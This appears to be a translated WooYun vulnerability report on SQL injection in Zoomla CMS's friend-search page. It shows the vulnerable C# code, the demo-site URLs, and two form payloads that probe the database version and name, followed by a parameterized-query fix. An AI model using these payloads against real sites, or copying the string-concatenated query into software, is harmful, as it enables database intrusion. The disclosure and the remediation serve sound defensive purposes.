WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing ------------- http://drop.zone.ci/
2014-08-09: Details reported to the vendor, awaiting vendor handling
2014-08-14: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-10-08: Details disclosed to core white hats and experts in related fields
2014-10-18: Details disclosed to ordinary white hats
2014-10-28: Details disclosed to intern white hats
2014-11-04: Details disclosed to the public
SQL injection in the latest version of Zoomla (逐浪) CMS
The latest version of Zoomla has a SQL injection reachable by an ordinary registered user. Register an account at
http://demo.zoomla.cn/User/Register.aspx
Register any user, e.g. test1234 with password 123456, then visit
http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=
Log in, then visit
http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx
The source of that page's Page_Load handler is as follows:

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!base.IsPostBack)
        {
            string str  = base.Request.Form["sex"];
            string str2 = base.Request.Form["age1"];
            string str3 = base.Request.Form["age2"];
            string str4 = base.Request.Form["wcounty"]; // not processed
            string str5 = base.Request.Form["wcity"];   // not processed
            string wherex = "";
            if (!string.IsNullOrEmpty(str))
            {
                if (str == "女生")
                {
                    wherex = wherex + " and UserSex=0";
                }
                else if (str == "男生")
                {
                    wherex = wherex + " and UserSex=1";
                }
            }
            if (!string.IsNullOrEmpty(str2))
            {
                string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString();
                wherex = wherex + " and BirthDay<='" + str7 + "'";
            }
            if (!string.IsNullOrEmpty(str3))
            {
                string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString();
                wherex = wherex + " and BirthDay>='" + str8 + "'";
            }
            if (!string.IsNullOrEmpty(str4))
            {
                wherex = wherex + " and workProvince='" + str4 + "'"; // injection here
                if (!string.IsNullOrEmpty(str5))
                {
                    wherex = wherex + " and workCity='" + str5 + "'"; // injection here
                }
            }
            this.ViewState["wherex"] = wherex;
            if (!this.buser.CheckLogin())
            {
                if (SiteConfig.UserConfig.EnableCheckCodeOfLogin)
                {
                    this.PhValCode.Visible = true;
                }
                else
                {
                    this.PhValCode.Visible = false;
                }
                this.dwindow.Style["display"] = "";
            }
            else
            {
                DataTable dt = new DataTable();
                dt = UserTableBLL.GetUsersInfo(wherex);
                this.Bind(dt);
            }
        }
    }

The `wcounty` and `wcity` form fields are concatenated straight into the WHERE clause with no validation or escaping.
Visit
http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx
and submit the following form data:
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 --
Proof of vulnerability as above.
Fix suggestion: sanitize the parameters before they reach the query.
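As an added example (not code from the Zoomla CMS project or from this report), here is how the same friend-search filter could be rebuilt so that form values are bound as SqlParameter objects instead of being concatenated into the WHERE clause. The column names (UserSex, BirthDay, workProvince, workCity) and form field names come from the source above; the table name `Users`, the `@` parameter names and the `FriendSearchQuery` class are assumptions made for this example.

```csharp
// Added example (not Zoomla CMS code): the friend-search filter built with
// parameterized SQL so user input never becomes part of the query text.
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Data;
using System.Data.SqlClient;

public static class FriendSearchQuery
{
    // Assumed table name; the report only shows the column names.
    private const string UserTable = "Users";

    // Builds the command for the given form fields. Every user-supplied value
    // is bound as a parameter; only fixed, allow-listed fragments are appended
    // to the SQL text.
    public static SqlCommand Build(SqlConnection conn, string sex, string age1,
                                   string age2, string wcounty, string wcity)
    {
        var where = new List<string>();
        var cmd = conn.CreateCommand();

        // Sex: mapped through a fixed allow-list, as in the original, so only
        // these two literal fragments can ever reach the query.
        if (sex == "女生") where.Add("UserSex = 0");
        else if (sex == "男生") where.Add("UserSex = 1");

        // Ages: strict parsing instead of Convert.ToInt32 (which throws on junk),
        // and the computed dates go in as typed parameters rather than
        // culture-dependent ToShortDateString() text.
        if (int.TryParse(age1, out int minAge))
        {
            where.Add("BirthDay <= @maxBirth");
            cmd.Parameters.Add("@maxBirth", SqlDbType.Date).Value = DateTime.Today.AddYears(-minAge);
        }
        if (int.TryParse(age2, out int maxAge))
        {
            where.Add("BirthDay >= @minBirth");
            cmd.Parameters.Add("@minBirth", SqlDbType.Date).Value = DateTime.Today.AddYears(-maxAge);
        }

        // Province/city: the fields that were concatenated raw in the original.
        // As parameters, a value containing quotes or comment sequences is simply
        // compared literally against the column.
        if (!string.IsNullOrEmpty(wcounty))
        {
            where.Add("workProvince = @province");
            cmd.Parameters.Add("@province", SqlDbType.NVarChar, 50).Value = wcounty;
            if (!string.IsNullOrEmpty(wcity))
            {
                where.Add("workCity = @city");
                cmd.Parameters.Add("@city", SqlDbType.NVarChar, 50).Value = wcity;
            }
        }

        cmd.CommandText = "SELECT * FROM " + UserTable +
                          (where.Count > 0 ? " WHERE " + string.Join(" AND ", where) : "");
        return cmd;
    }

    // Equivalent of the data-binding branch of Page_Load: reads the form fields,
    // runs the parameterized query and returns the result table.
    public static DataTable Search(string connectionString, NameValueCollection form)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = Build(conn, form["sex"], form["age1"], form["age2"],
                               form["wcounty"], form["wcity"]))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            var dt = new DataTable();
            adapter.Fill(dt); // opens and closes the connection as needed
            return dt;
        }
    }
}
```

Note that the original stores the assembled SQL fragment in ViewState["wherex"] for reuse on postback; with the parameterized version the raw field values (not SQL text) are what should be kept and the command rebuilt from them, so the parameter boundary is preserved on every request.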
Severity: no impact (vendor ignored)
Ignored at: 2014-11-04 19:42
None yet.